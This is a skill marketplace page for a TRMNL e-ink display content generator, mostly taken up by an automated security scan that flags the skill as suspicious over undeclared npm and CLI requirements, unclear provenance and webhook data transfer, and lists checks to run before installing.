Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
TRMNL Display
v1.0.3Generate content for TRMNL e-ink display devices using the TRMNL CSS framework and send via the trmnl CLI. Use when the user wants to display information on their TRMNL device, send messages to an e-ink display, create dashboard content, show notifications, or update their terminal display. Supports rich layouts with the TRMNL framework (flexbox, grid, tables, progress bars, typography utilities).
⭐ 2· 2.7k·0 current·0 all-time
bypeetzweg/@peetzweg
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
SKILL.md is a focused TRMNL content generator and send workflow — that aligns with the skill description. However the manifest declares no required binaries or credentials while the runtime instructions tell the agent to run npm and the trmnl CLI (npm install -g trmnl-cli; trmnl send, trmnl plugin add). The metadata omission (no required binaries listed) is an inconsistency the publisher should have declared. Also the package source/homepage is unknown (registry metadata shows no homepage and 'Source: unknown'), so provenance is unclear.
Instruction Scope
The SKILL.md stays within the stated purpose: generate HTML using the TRMNL framework and POST it to configured TRMNL webhook plugins. It does instruct writing files to /tmp and sending them to plugin webhook URLs (e.g., https://trmnl.com/api/custom_plugins/{uuid}). This is expected for the stated function but means the skill will transfer user-generated HTML to external endpoints; ensure those endpoints (plugin URLs) are trusted and under the user's control. The doc also explicitly warns not to echo content back to chat — a sign the payload may be sensitive.
Install Mechanism
There is no formal install spec in the registry (instruction-only skill), which is lower risk than an automated installer. However SKILL.md tells the operator to run 'npm install -g trmnl-cli@latest' — installing a global npm package executes third-party code from the npm registry. Because the skill metadata does not declare this requirement or provide a trusted upstream/homepage, that step increases risk and should be performed only after verifying the package and its publisher.
Credentials
The skill requests no environment variables, credentials, or config paths in the manifest. The instructions use plugin webhook URLs (UUID-based) but do not ask for unrelated secrets. Still, the webhook API docs show that HTML in payloads is not auto-escaped and that Liquid templates can access user fields (email, name) on the TRMNL side, so users should avoid sending sensitive data in content.
Persistence & Privilege
The skill does not request always:true, does not declare system-wide changes, and has no install-time persistence or config writes defined in the registry. Autonomous invocation is allowed by default but not combined with other high-risk factors here.
What to consider before installing
Key things to check before installing/using this skill:
1) Provenance: the registry entry has no homepage and the source is listed as unknown. Verify the origin of trmnl-cli (npm package) and prefer installing it manually after reviewing the package on npmjs.com or its repository. Do not run global installs blindly.
2) Declared requirements mismatch: the skill metadata lists no required binaries, but SKILL.md instructs using npm and the trmnl CLI. Treat that as an omission — expect to need npm/node and the trmnl-cli executable.
3) External webhooks: the workflow sends HTML to plugin webhook URLs (https://trmnl.com/api/custom_plugins/{uuid} or similar). Only add/send to plugin URLs you control and trust. Any content you send will be visible to the receiving endpoint and (per docs) HTML is NOT auto-escaped on the server side.
4) Sensitive data: do not include passwords, API keys, personal data, or secrets in HTML payloads. The docs show Liquid templates can access user data on the TRMNL side, so avoid embedding anything sensitive in merge_variables.content.
5) Validate locally: use 'trmnl validate --file' locally and inspect the payload before sending. If possible, test with a benign plugin endpoint you control (a simple server you run) to confirm behavior.
6) Package safety: audit the npm package (trmnl-cli) before global installation — check the publisher, recent release notes, and the package contents for unexpected network or filesystem operations.
7) If you need higher assurance: ask the skill publisher for repo/homepage and a signed release or source link; without that information, treat this skill as unvetted.
These issues make the skill coherent with its stated function but raise enough provenance and metadata mismatches to avoid a 'benign' verdict without further verification.Like a lobster shell, security has layers — review code before you run it.
latestvk973jxd30m39ppkf8hcwyh8m4d80qtrt
License
MIT-0
Free to use, modify, and redistribute. No attribution required.